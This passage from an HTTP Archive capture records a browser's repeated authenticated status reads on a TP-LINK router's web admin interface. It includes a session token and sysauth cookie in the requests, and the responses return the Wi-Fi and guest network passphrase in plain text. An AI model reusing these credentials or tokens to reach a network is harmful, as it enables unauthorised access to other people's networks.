\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"h
igh\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 276,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 693,\r\n \"receive\": 25\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:19.651+03:00\",\r\n \"time\": 1842,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n 
{\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 251,\r\n \"connect\": 523,\r\n \"send\": 0,\r\n \"wait\": 793,\r\n 
\"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:29.645+03:00\",\r\n \"time\": 990,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n 
\"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4755,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5
\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryp
tion\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\
\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4755\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 276,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 674,\r\n \"receive\": 40\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:29.651+03:00\",\r\n \"time\": 1855,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 
Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n 
\"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 250,\r\n \"connect\": 520,\r\n \"send\": 0,\r\n \"wait\": 810,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:39.647+03:00\",\r\n \"time\": 995,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n 
\"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wirel
ess_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\